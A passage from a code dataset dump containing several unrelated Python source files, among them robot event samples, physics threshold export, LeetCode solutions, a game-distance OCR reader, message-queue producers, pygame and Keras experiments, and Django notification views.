6)\r\n\r\nturtle.done()","sub_path":"week03/turtle10.py","file_name":"turtle10.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"337319097","text":"\"\"\"\nSample 7: Listening for events\n\nDemonstrates a couple basic ways of using events.\n\"\"\"\n\nimport sys\nsys.path.append(\"..\") # Add stk library to Python Path, if needed\n\nimport stk.runner\nimport stk.services\nimport stk.events\n\nclass EventsDemo(object):\n \"Simple activity, demonstrating simple ways to listen to events.\"\n def __init__(self, qiapp):\n self.qiapp = qiapp\n self.events = stk.events.EventHelper(qiapp.session)\n self.s = stk.services.ServiceCache(qiapp.session)\n\n def on_touched(self, *args):\n \"Callback for tablet touched.\"\n if args:\n self.events.disconnect(\"ALTabletService.onTouchDown\")\n self.s.ALTextToSpeech.say(\"Yay!\")\n self.stop()\n\n def on_start(self):\n \"Ask to be touched, waits, and exits.\"\n # Two ways of waiting for events\n # 1) block until it's called\n self.s.ALTextToSpeech.say(\"Touch my forehead.\")\n self.events.wait_for(\"FrontTactilTouched\")\n # 1) connect a callback\n if self.s.ALTabletService:\n self.events.connect(\"ALTabletService.onTouchDown\", self.on_touched)\n self.s.ALTextToSpeech.say(\"okay, now touch my tablet.\")\n else:\n self.s.ALTextToSpeech.say(\"oh, I don't have a tablet...\")\n self.stop()\n\n def stop(self):\n \"Standard way of stopping the application.\"\n self.qiapp.stop()\n\n def on_stop(self):\n \"Cleanup\"\n self.events.clear()\n\nif __name__ == \"__main__\":\n stk.runner.run_activity(EventsDemo)\n","sub_path":"python/samples/sample_7_events.py","file_name":"sample_7_events.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"320862552","text":"import sys\nimport numpy as np\nimport ROOT\nfrom ROOT import gROOT, AddressOf\nimport pickle\nOS = sys.platform\nif OS == 'win32':\n sep = '\\\\'\nelif OS == 'linux2':\n sep = '/'\nelse:\n print(\"ERROR: OS {} non compatible\".format(OS))\n sys.exit()\n\nstep = -0.5\nbase_value = 347\nclass thr_importer_cl():\n \n def __init__(self, scan_path):\n self.run_path = scan_path\n self.baseline = {}\n self.baseline_from_calib_matrix=np.zeros((20, 8, 64))\n self.real_baseline_T = np.zeros((20, 8, 64))\n self.real_baseline_E = np.zeros((20, 8, 64))\n self.thr_matrix_T = np.zeros((20, 8, 64))\n self.thr_matrix_E = np.zeros((20, 8, 64))\n self.distance_from_baseline = np.zeros((20,8,64))\n self.diff_matrix = np.zeros((20,8,3))\n \n def import_run_thr(self):\n \"\"\"\n Funcion to import the channel configuration from old RUNS. Needs the pickle containing the data\n :return:\n \"\"\"\n File_name = \"conf_files/CONF_run_375.pkl\"\n\n with open(File_name, 'rb') as f:\n old_conf_dict = pickle.load(f)\n\n for GEMROC_key, dict in old_conf_dict.items():\n GEMROC_id=GEMROC_key.split(\" \")[1]\n for TIGER_key, dict2 in dict.items():\n if TIGER_key.split(\" \")[0] == \"TIGER\":\n TIGER_id = int(TIGER_key.split(\" \")[1])\n for channel_key, dict3 in dict2.items():\n if channel_key.split(\" \")[0] == \"Ch\":\n channel_id = int(channel_key.split(\" \")[1])\n print (\"{} - {} - {}\".format(GEMROC_id, TIGER_id, channel_id))\n try:\n print (dict3[\"Vth_T1\"])\n print (dict3[\"Vth_T2\"])\n self.thr_matrix_T[int(GEMROC_id)][int(TIGER_id)][int(channel_id)]=dict3[\"Vth_T1\"]\n self.thr_matrix_E[int(GEMROC_id)][int(TIGER_id)][int(channel_id)]=dict3[\"Vth_T2\"]\n except KeyError as e:\n print ('I a KeyError - missing %s. Probably a GEMROC is offline '% str(e))\n break\n # print self.GEMROC_reading_dict[GEMROC_key].c_inst.Channel_cfg_list[TIGER_id][channel_id]\n print (\"Channel settings for {} loaded\".format(GEMROC_key))\n\n def save_delta_VTHR_root(self):\n \"\"\"\n Save the information about thr and baseline in a root file\n :return:\n \"\"\"\n gROOT.ProcessLine('struct TreeStruct2 {\\\n int layer_id;\\\n int gemroc_id;\\\n int software_feb_id;\\\n int channel_id;\\\n int baseline;\\\n int vth1_digit;\\\n int vth2_digit;\\\n float vth1_mV;\\\n float vth2_mV;\\\n };')\n rootFile = ROOT.TFile(\"thresholds.root\", 'recreate')\n tree = ROOT.TTree('tree', '')\n mystruct = ROOT.TreeStruct2()\n for key in ROOT.TreeStruct2.__dict__.keys():\n if '__' not in key:\n formstring = '/F'\n if isinstance(mystruct.__getattribute__(key), int):\n formstring = '/I'\n tree.Branch(key, AddressOf(mystruct, key), key + formstring)\n\n for GEMROC in range(0, 4):\n for TIGER in range(0, 8):\n for ch in range(0, 64):\n mystruct.layer_id = int(1)\n mystruct.gemroc_id = (int(GEMROC))\n mystruct.software_feb_id = int(TIGER)\n mystruct.channel_id = int(ch)\n mystruct.vth1_digit = int(self.thr_matrix_T[GEMROC][TIGER][ch])\n mystruct.vth2_digit = int(self.thr_matrix_E[GEMROC][TIGER][ch])\n mystruct.vth1_mV = float(mystruct.vth1_digit*step+base_value)\n mystruct.vth2_mV = float(mystruct.vth2_digit*step+base_value)\n tree.Fill()\n\n for GEMROC in range(4, 11):\n for TIGER in range(0, 8):\n for ch in range(0, 64):\n mystruct.layer_id = int(2)\n mystruct.gemroc_id = (int(GEMROC))\n mystruct.software_feb_id = int(TIGER)\n mystruct.channel_id = int(ch)\n mystruct.baseline = int(self.real_baseline_T[GEMROC][TIGER][ch])\n mystruct.vth1_digit = int(self.thr_matrix_T[GEMROC][TIGER][ch])\n mystruct.vth2_digit = int(self.thr_matrix_E[GEMROC][TIGER][ch])\n mystruct.vth1_mV = float(mystruct.vth1_digit*step+base_value)\n mystruct.vth2_mV = float(mystruct.vth2_digit*step+base_value)\n tree.Fill()\n rootFile.Write()\n rootFile.Close()\n\nif __name__ == \"__main__\":\n thr_importer = thr_importer_cl(\"./scans\")\n thr_importer.import_run_thr()\n thr_importer.save_delta_VTHR_root()\n","sub_path":"export/thr_extration.py","file_name":"thr_extration.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"413750244","text":"class Solution(object):\r\n def twoSum(self, nums, target):\r\n if not nums or len(nums) == 1:\r\n return []\r\n dictionary = {}\r\n for index, num in enumerate(nums):\r\n if target-num not in dictionary:\r\n dictionary[num] = index\r\n else:\r\n return [dictionary[target-num], index]\r\n return []\r\n","sub_path":"groupon/LC1TwoSum.py","file_name":"LC1TwoSum.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"164767135","text":"from PIL import ImageGrab\nimport numpy as np\nimport cv2\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef load_digits():\n mypath='/Users/tadhgriordan/Documents/pyQwopper/images/' #\n onlyfiles = [ f for f in listdir(mypath) if isfile(join(mypath,f)) ]\n images = np.empty(len(onlyfiles), dtype=object)\n for n in range(0, len(onlyfiles)):\n images[n] = cv2.imread( join(mypath,onlyfiles[n]) )\n return images\n\ndef replace(output):\n #get index of first value after \"-\" (if present) and last value before dot (if present) - delete everything in between.\n fst = 1 if \"-\" in output else 0\n lst = len(output)-1 if not(\".\" in output) else output.index(\".\")-1 \n if(fst==lst): return output\n else: return output[0:fst+1] + output[lst:]\n\ndef format_output(total_coords, last_output): \n total_coords.sort(key=lambda x: x[0]) #sort coordinates by x value\n output = \"\"\n for coord in total_coords:\n if(coord[1]==10): \n if(\".\" not in output): output += \".\" #if coord is '.' and not in output, append \n elif(coord[1]==11): \n if(\"-\" not in output): output += \"-\" #if coord is '-' and not in output, append \n elif((\".\" not in output) or (\".\" in output and output.index(\".\") is len(output)-1)): output += str(coord[1])\n \n output = replace(fst, lst, output) \n if((last_output == \"3.9\" or last_output == \"4\" or last_output == \"4.1\") and output == \"44\"): output = \"4\" #special case. \n return output\n \nimages = load_digits()\nlast_output = \"\"\noutput = \"\"\n\nwhile(True):\n img = ImageGrab.grab(bbox=(535,239,618,265)) #bbox specifies specific region (bbox= x,y,width,height)\n img_np = np.array(img)\n\n frame = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n threshold = 0.884\n total_coords = []\n for count, image in enumerate(images):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n result = cv2.matchTemplate(frame,image,cv2.TM_CCOEFF_NORMED) \n match_indices = np.arange(result.size)[(result>threshold).flatten()] \n coords = np.unravel_index(match_indices,result.shape) #coordinate of match(s)\n\n if len(coords[1])>0: #only coords[1] matters. its of size 2, 0 has y value and 1 has x i think. if match(s) found:\n for np_coord in coords[1]:\n total_coords.append([np_coord, count]) # add coordinate and digit to total coordinates\n \n output = format_output(total_coords, last_output) \n print(\"output: \" + output)\n last_output = output\n \n #cv2.imshow(\"PyQwopper\", frame)\n #cv2.waitKey(1)\ncv2.destroyAllWindows()\n\n#co-ordinates for full box: (317,253,960,650)\n#co-ordinates for distance only: (535,239,608,265)\n\n\n\n","sub_path":"interface/main/distance_read.py","file_name":"distance_read.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"227345151","text":"# -*- coding:utf-8 -*-\n__author__ = 'gaga'\nfrom oslo_config import cfg\nfrom naas.rabbitmq.producer import sendPublish\nfrom naas.api.handler import task_hander\nfrom oslo_log import log as logging\nimport json\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\nrabbitMQ = [\n cfg.StrOpt('api_scheduler_exchange',\n default='api_scheduler_exchange', help=''),\n cfg.StrOpt('api_scheduler_routing_key',\n default='api_scheduler_routing_key', help=''),\n\n]\nCONF.register_opts(rabbitMQ, 'rabbitMQ')\n\n\nclass BasicMQ(object):\n TASK_JSON_BODY = {}\n MQ_BODY_INIT = {}\n\n def __init__(self, name, object_id, exchange_name=None, routing_key=None, **kwargs):\n self.exchange_name = exchange_name or CONF.rabbitMQ.api_scheduler_exchange\n self.routing_key = routing_key or CONF.rabbitMQ.api_scheduler_routing_key\n self.object_id = object_id\n self.name = name\n self.extra = kwargs\n\n def _create_task(self, task_body):\n task_id = task_hander.add(task_body)\n return task_id\n\n def _update_task(self, task_id, body):\n task_body = {'task': {'task_id': task_id, 'body': body}}\n task_hander.update(task_body)\n\n def publish_mq_to_scheduler(self, msg):\n sendPublish(self.exchange_name, self.routing_key, msg)\n\n def send_message(self):\n try:\n self.TASK_JSON_BODY['task']['object_id'] = self.object_id\n self.TASK_JSON_BODY['task']['name'] = self.name\n task_id = self._create_task(self.TASK_JSON_BODY)\n mq_body = self.MQ_BODY_INIT[self.name]\n mq_body['task_id'] = task_id\n mq_body['object_id'] = self.object_id\n if self.extra:\n mq_body.update(self.extra)\n self._update_task(task_id, json.dumps(mq_body))\n self.publish_mq_to_scheduler(json.dumps(mq_body))\n except Exception as e:\n LOG.error(str(e))\n\n\nclass TunnelMQ(BasicMQ):\n TASK_JSON_BODY = {\n 'task': {\n 'status': 'running',\n 'object_type': 'tunnel'\n }\n }\n MQ_BODY_INIT = {\n 'create_tunnel': {\n 'name': 'create_tunnel',\n 'object_type': 'tunnel'\n },\n 'del_tunnel': {\n 'name': 'del_tunnel',\n 'object_type': 'tunnel'\n },\n 'change_bandwidth': {\n 'name': 'change_bandwidth',\n 'object_type': 'tunnel'\n },\n 'pause_tunnel': {\n 'name': 'pause_tunnel',\n 'object_type': 'tunnel'\n },\n 'resume_tunnel': {\n 'name': 'resume_tunnel',\n 'object_type': 'tunnel'\n }\n }\n\n\nclass SwitchMQ(BasicMQ):\n TASK_JSON_BODY = {\n 'task': {\n 'status': 'running',\n 'object_type': 'switch_port'\n }\n }\n\n MQ_BODY_INIT = {\n 'change_switch_port': {\n 'name': 'change_switch_port',\n 'object_type': 'switch_port'\n }\n\n }\n\n\nif __name__ == '__main__':\n TunnelMQ('create_tunnel', 1).send_message()\n\n\n","sub_path":"naas/api/mq/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"294569423","text":"#!/usr/bin/env python\n\"\"\" pygame.examples.moveit\n\nThis is the full and final example from the Pygame Tutorial,\n\"How Do I Make It Move\". It creates 10 objects and animates\nthem on the screen.\n\nNote it's a bit scant on error checking, but it's easy to read. :]\nFortunately, this is python, and we needn't wrestle with a pile of\nerror codes.\n\"\"\"\nimport os\nimport pygame as pg\n\nmain_dir = os.path.split(os.path.abspath(__file__))[0]\n\n# our game object class\nclass GameObject:\n def __init__(self, image, height, speed):\n self.speed = speed\n self.image = image\n self.pos = image.get_rect().move(0, height)\n\n def move(self):\n self.pos = self.pos.move(self.speed, 0)\n if self.pos.right > 600:\n self.pos.left = 0\n\n\n# quick function to load an image\ndef load_image(name):\n path = os.path.join(main_dir, \"data\", name)\n return pg.image.load(path).convert()\n\n\n# here's the full code\ndef main():\n pg.init()\n screen = pg.display.set_mode((640, 480))\n\n player = load_image(\"player1.gif\")\n background = load_image(\"liquid.bmp\")\n\n # scale the background image so that it fills the window and\n # successfully overwrites the old sprite position.\n background = pg.transform.scale2x(background)\n background = pg.transform.scale2x(background)\n\n screen.blit(background, (0, 0))\n\n objects = []\n for x in range(10):\n o = GameObject(player, x * 40, x)\n objects.append(o)\n\n while 1:\n for event in pg.event.get():\n if event.type in (pg.QUIT, pg.KEYDOWN):\n return\n\n for o in objects:\n screen.blit(background, o.pos, o.pos)\n for o in objects:\n o.move()\n screen.blit(o.image, o.pos)\n\n pg.display.update()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Ricardo_OS/Python_backend/venv/lib/python3.8/site-packages/pygame/examples/moveit.py","file_name":"moveit.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"447198483","text":"'''\n분류 : 다이나믹 프로그래밍\n문제 : 정수 삼각형 (백준 1932)\n작성일자 : 2021.06.01\n'''\n\n# 목적 : 위에서 아래로 점수를 합해서 내려올 때 최댓값을 출력\n# 접근 : 현재위치는 현재의 대왼, 대오의 합 중 최대값으로 갱신한다\n# 단, 외곽에 위치한 경우는 다르게\n# 구현 : 입력받을 때 N*N크기의 이중 리스트로 만들 수 있게 여백을 채우기\n# 어차피 열의 index j가 i의 값에 의존하므로 굳이 채울 필요는 없음\nN = int(input())\nlst = []\nfor _ in range(N) : \n lst.append(list(map(int, input().split())))\n # temp = list(map(int, input().split()))\n # temp_len = len(temp)\n # zero = [-1] * (N-temp_len)\n # temp.extend(zero)\n # lst.append(temp)\nfor i in range(1,N) : \n for j in range(i+1) : \n if j == 0 : \n lst[i][j] = lst[i][j] + lst[i-1][j]\n elif j == i : \n lst[i][j] = lst[i][j] + lst[i-1][j-1]\n else : \n lst[i][j] = lst[i][j] + max(lst[i-1][j-1],lst[i-1][j])\nres = -1\nfor i in range(N) : \n res = max(res,lst[N-1][i])\nprint(res)\n","sub_path":"DP/dp_13_1932.py","file_name":"dp_13_1932.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"480851757","text":"# Time complexity O(1)\n# Space complexity O(m+n)\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n \n lenA, lenB = 0, 0\n \n ptr = headA\n while(ptr):\n lenA += 1\n ptr = ptr.next\n ptr = headB\n while(ptr):\n lenB += 1\n ptr = ptr.next\n \n if lenA > lenB:\n for i in range(lenA - lenB):\n headA = headA.next\n else:\n for i in range(lenB - lenA):\n headB = headB.next\n \n while(headA != headB):\n headA = headA.next\n headB = headB.next\n \n return headA","sub_path":"intersectNode.py","file_name":"intersectNode.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"569865049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n###############################################################################\n# Copyright Kitware Inc. and Epidemico Inc.\n#\n# Licensed under the Apache License, Version 2.0 ( the \"License\" );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\nimport os\nimport uuid\nfrom gaia import get_abspath, config, GaiaException, types, formats\n\n\nclass GaiaProcess(object):\n \"\"\"\n Abstract class to define a geospatial process\n \"\"\"\n\n # TODO: Enforce required inputs and args\n required_inputs = []\n required_args = []\n optional_args = [\n {\n 'name': 'parent',\n 'title': 'Parent ID',\n 'description': 'Parent ID (UUID format)',\n 'type': str\n }\n\n ]\n default_output = None\n args = None\n\n def __init__(self, inputs=None, output=None, parent=None, **kwargs):\n self.inputs = inputs\n self.output = output\n self.parent = parent\n self.id = str(uuid.uuid4())\n for k, v in kwargs.items():\n setattr(self, k, v)\n self.validate()\n\n def test_arg_type(self, arg, arg_type):\n \"\"\"\n Try to cast a process argument to its required type. Raise an\n exception if not successful.\n :param arg: The argument property\n :param arg_type: The required argument type (int, str, etc)\n \"\"\"\n try:\n arg_type(getattr(self, arg))\n except Exception:\n raise GaiaException('Required argument {} must be of type {}'\n .format(arg, arg_type))\n\n def validate(self):\n \"\"\"\n Ensure that all required inputs and arguments are present.\n \"\"\"\n # for input in self.inputs:\n # if input.\n input_types = []\n errors = []\n\n for input in self.inputs:\n type = input.type\n if type == types.PROCESS:\n for t in [i for i in dir(types) if not i.startswith(\"__\")]:\n if any((True for x in input.default_output if x in getattr(\n formats, t, []))):\n type = getattr(types, t)\n break\n input_types.append(type)\n\n for i, req_input in enumerate(self.required_inputs):\n if i >= len(input_types):\n errors.append(\"Not enough inputs for process\")\n elif req_input['type'] != input_types[i]:\n errors.append(\"Input #{} is of incorrect type.\".format(i+1))\n\n if len(input_types) > len(self.required_inputs):\n if (self.required_inputs[-1]['max'] is not None and\n len(input_types) > len(self.required_inputs) +\n self.required_inputs[-1]['max']-1):\n errors.append(\"Incorrect # of inputs; expected {}\".format(\n len(self.required_inputs)))\n else:\n for i in range(len(self.required_inputs)-1, len(input_types)):\n if input_types[i] != self.required_inputs[-1]['type']:\n errors.append(\n \"Input #{} is of incorrect type.\".format(i + 1))\n if errors:\n raise GaiaException('\\n'.join(errors))\n for item in self.required_args:\n arg, arg_type = item['name'], item['type']\n if not hasattr(self, arg) or getattr(self, arg) is None:\n raise GaiaException('Missing required argument {}'.format(arg))\n self.test_arg_type(arg, arg_type)\n if 'options' in item and getattr(self, arg) not in item['options']:\n raise GaiaException('Invalid value for {}'.format(item['name']))\n for item in self.optional_args:\n arg, arg_type = item['name'], item['type']\n if hasattr(self, arg) and getattr(self, arg) is not None:\n self.test_arg_type(arg, arg_type)\n argval = getattr(self, arg)\n if 'options' in item and argval not in item['options']:\n raise GaiaException(\n 'Invalid value for {}'.format(item['name']))\n\n def compute(self):\n \"\"\"\n Abstract method for running process\n \"\"\"\n raise NotImplementedError()\n\n def purge(self):\n \"\"\"\n Delete the process output\n \"\"\"\n self.output.delete()\n\n def get_outpath(self, uri=config['gaia']['output_path']):\n \"\"\"\n Get the output path of the process\n\n :param uri: base output path\n :return: Process output path\n \"\"\"\n ids_path = '{}/{}'.format(\n self.parent, self.id) if self.parent else self.id\n return get_abspath(\n os.path.join(uri, ids_path,\n '{}{}'.format(self.id, self.default_output[0])))\n\n def get_input_classes(self):\n \"\"\"\n Get the unique set of input classes\n\n :return: set of classes\n \"\"\"\n io_classes = set()\n for input in self.inputs:\n input_class = input.__class__.__name__\n if 'Process' not in input_class:\n io_classes.add(input.__class__.__name__)\n else:\n io_classes = io_classes.union(input.process.get_input_classes())\n return io_classes\n","sub_path":"gaia/gaia_process.py","file_name":"gaia_process.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"573919495","text":"import tensorflow as tf\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Embedding, Dense, Dropout\nfrom tensorflow.keras.layers import LSTM, Bidirectional, GlobalMaxPool1D\nfrom tensorflow.keras.callbacks import Callback\nfrom tensorflow.keras.initializers import RandomNormal\nimport numpy as np\nimport random\nimport math\n\nfrom datasets import Dataset\n\nrandom.seed(42)\nnp.random.seed(42)\n\nRandomNormal(mean=0.0, stddev=0.05, seed=42)\n\ndef unique_rows(a):\n a = np.ascontiguousarray(a)\n unique_a = np.unique(a.view([('', a.dtype)]*a.shape[1]))\n return unique_a.view(a.dtype).reshape((unique_a.shape[0], a.shape[1]))\n\n\nclass LastLossAccuracy(Callback):\n \n # def on_batch_end(self, epoch, logs=None):\n # print()\n # print(logs.keys())\n \n # def on_train_batch_end(self, epoch, logs=None):\n # print()\n # print(logs.keys())\n \n def on_epoch_end(self, epoch, logs=None):\n self.loss = logs['loss']\n # self.accuracy = logs['accuracy']\n\nds = Dataset(\"pgm-data/TRAIN.arff\",\n \"pgm-data/TEST.arff\",\n \"pgm-data/train.pickle\",\n \"pgm-data/test.pickle\")\n\ninput_array = ds.hotones_train_merged()\ninput_array_original = input_array[:]\n\nnum_words = 2\nlength_vocabulary = len(input_array[0])\nembedding_size = 8\nsamples = 1\ntrain_size = 0.8\ntest_size = 0.2\n\nassert train_size + test_size == 1.0\n\n# artificial_input = np.random.randint(num_words, \n # size=(10000, length_vocabulary))\n# input_array = np.append(input_array, artificial_input, axis=0)\n# input_array = artificial_input\n\ninput_array = unique_rows(input_array)\n\nprint(input_array.shape)\n\n# input_array = np.tile(np.identity(length_vocabulary), [samples,1])\n# input_array = np.random.randint(num_words, size=(samples, length_vocabulary))\n\nnp.random.shuffle(input_array)\n\nlength_input = input_array.shape[0]\nend_train_set = math.floor(length_input * train_size)\ntrain_input_array = input_array[:end_train_set]\ntest_input_array = input_array[end_train_set:]\n\nmodel = Sequential()\nmodel.add(Embedding(length_vocabulary, # 112\n embedding_size,\n input_length=length_vocabulary,\n name='emb'))\nmodel.add(Bidirectional(LSTM(128, return_sequences=True))) #16\nmodel.add(GlobalMaxPool1D())\nmodel.add(Dropout(0.2))\n# model.add(Dense(512, activation='relu'))\n# model.add(Dropout(0.2))\n# model.add(Dense(256, activation='relu'))\n# model.add(Dropout(0.2))\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(length_vocabulary, activation='sigmoid'))\n# model.compile(optimizer=tf.keras.optimizers.RMSprop(lr=0.01),\n# loss='mean_squared_error',\n# metrics=['accuracy'])\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nlla = LastLossAccuracy()\n\nmodel.fit(train_input_array,\n train_input_array,\n epochs=10, # 5000\n verbose=1,\n workers=2,\n shuffle=False,\n validation_data=(test_input_array, test_input_array),\n callbacks=[lla])\n\n# model.save('pgm-data/deeplearn_model.h5')\n\nloss = model.evaluate(\n input_array_original,\n input_array_original,\n verbose=1,\n workers=2,\n)\n\nprint(\"eval original vector accuracy:\", loss[1])\nprint(\"eval original vector loss:\", loss[0])\n\nemb = model.get_layer(name='emb')\nprint(np.array(emb.get_weights()).shape)\ncoords = emb.get_weights()[0]\nprint(\"coord:\", coords.shape)\n\nfrom matplotlib import pyplot as plt\n\n# for coord, ho in zip(coords, range(len(coords))):\n# plt.text(coord[0], coord[1], ho,\n# ha='center',\n# va='center',\n# size=8)\n\nfrom sklearn.decomposition import KernelPCA\nfrom sklearn.mixture import BayesianGaussianMixture\nfrom colors import random_colors\n\nbgm_model = BayesianGaussianMixture(\n n_components=4,\n covariance_type='full',\n max_iter=1000,\n n_init=1,\n init_params='kmeans',\n)\nbgm_model.fit(coords)\ny = bgm_model.predict(coords)\n\nprojection = KernelPCA(n_components=embedding_size, kernel=\"cosine\")\nprojection = projection.fit(coords)\nx_orig = projection.transform(coords)\n\n# projection = KernelPCA(n_components=8, kernel=\"linear\")\n# projection = projection.fit(input_array)\n# # X_proj = projection.transform(input_array)\n# x_orig = projection.transform(input_array_original)\n\n# bgm_model.fit(x_orig[:, 0:8])\n# y = bgm_model.predict(x_orig[:, 0:8])\n\nprint(\"classes:\", np.max(y) + 1)\n# print(lla.loss, length_vocabulary)\n\ncolors = random_colors(np.max(y) + 1, dist=0.15)\nselected_color = colors[:np.max(y) + 1]\ncor = selected_color[y]\n\n_, ax = plt.subplots()\nax.scatter(\n x_orig[:, 0],\n x_orig[:, 1],\n s=10,\n color=cor\n)\n\nplt.axis([-3,3,-3,3])\nplt.xticks = []\nplt.yticks = []\nplt.show()\n\n# print(x_orig)","sub_path":"notes_embeddings.py","file_name":"notes_embeddings.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"203150762","text":"from django import forms\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework import permissions, status, pagination, generics\nfrom CustomPermissions import ValidEmail\nfrom userfeatures.models import EpisodeCommentNotification\nfrom userfeatures.serializers import EpisodeCommentNotificationList\nfrom rest_framework.response import Response\n\n\nclass EpisodeCommentNotificationPagination(pagination.PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n page_query_param = 'page'\n \n\n def get_paginated_response(self, data):\n return Response({\n 'links': {\n 'next': self.get_next_link(),\n 'previous': self.get_previous_link()\n },\n 'count': self.page.paginator.count,\n 'total_pages': self.page.paginator.num_pages,\n 'results': data\n })\n\n\nclass UnseenNotifications(APIView):\n\n permission_classes = [permissions.IsAuthenticated, ValidEmail]\n \n def get(self, request, format=None):\n response_data = {}\n response_data[\"count\"] = EpisodeCommentNotification.objects.filter(user_notified=request.user, seen=False).count()\n return Response(response_data, status=status.HTTP_200_OK)\n\n def post(self, request, format=None):\n \"\"\"\n Post a specific notification to indicate its been seen\n \"\"\"\n response_data = {}\n sponge=forms.CharField(required=False)\n ec_notification = None\n \n if 'ecNotification_pk' not in request.data:\n response_data[\"detail\"] = \"malformed payload\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n \n try:\n # Get notification\n ec_notification = EpisodeCommentNotification.objects.get(pk=sponge.clean(request.data.get(\"ecNotification_pk\")))\n except EpisodeCommentNotification.DoesNotExist as e:\n response_data[\"detail\"] = \"Could not find notification\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n #print(e)\n response_data[\"detail\"] = \"Something went kinda wrong\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST) \n\n if ec_notification.user_notified != request.user:\n \"\"\"\n XSS attack\n \"\"\"\n response_data[\"detail\"] = \"No means no!\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST) \n \n \n ec_notification.seen=True\n\n try:\n ec_notification.save()\n except Exception as e:\n response_data[\"detail\"] = \"Something went really wrong\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n\n\n response_data[\"success\"] = \"true\"\n return Response(response_data, status=status.HTTP_200_OK)\n\n \n def delete(self, request, format=None):\n \"\"\"\n Delete de notification!\n \"\"\"\n response_data = {}\n sponge=forms.CharField(required=False)\n if 'ecNotification_pk' not in request.data:\n response_data[\"detail\"] = \"malformed payload\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n \n try:\n # Get notification\n ec_notification = EpisodeCommentNotification.objects.get(pk=sponge.clean(request.data.get(\"ecNotification_pk\")))\n except EpisodeCommentNotification.DoesNotExist as e:\n response_data[\"detail\"] = \"Could not find notification\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n #print(e)\n response_data[\"detail\"] = \"Something went kinda wrong\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST) \n\n if ec_notification.user_notified != request.user:\n response_data[\"detail\"] = \"Nope!\"\n return Response(response_data, status=HTTP_405_NOT_ALLOWED)\n\n try:\n ec_notification.delete()\n except Exception as e:\n response_data[\"detail\"] = \"Something went really wrong\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n\n\n response_data[\"success\"] = \"true\"\n return Response(response_data, status=status.HTTP_200_OK)\n\n\n\n\nclass EpisodeCommentNotifications(generics.ListAPIView):\n \"\"\"\n Receive the episode comment notifications for a given user\n \"\"\"\n permission_classes = [permissions.IsAuthenticated, ValidEmail]\n serializer_class = EpisodeCommentNotificationList\n pagination_class = EpisodeCommentNotificationPagination\n\n def get_queryset(self):\n query = EpisodeCommentNotification.objects.filter(user_notified = self.request.user)\n return query\n\n","sub_path":"userfeatures/views/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"418069826","text":"import warnings\n\nimport xmltodict\nfrom random import randint, choice, uniform\n\nimport Constants\nfrom Constants import *\n\n\nclass Processor:\n class __processorParser:\n def __init__(self):\n self.branchIndex = 0\n # check if file exists\n parse = self.fetch_xml_data(Constants.PATH_PROCESSOR)\n self._setInstructionXML()\n self.proc_infos = parse[PROCESSOR]\n\n # Blocked registers\n self._blocked_registers = []\n\n # parse configurations from xml\n # Set register\n if isinstance(self.proc_infos[REGISTER_FILE], dict):\n self.register = dict(self.proc_infos[REGISTER_FILE])\n self.blockHardRegister()\n else:\n self.register = {}\n\n # Set issue slots\n if 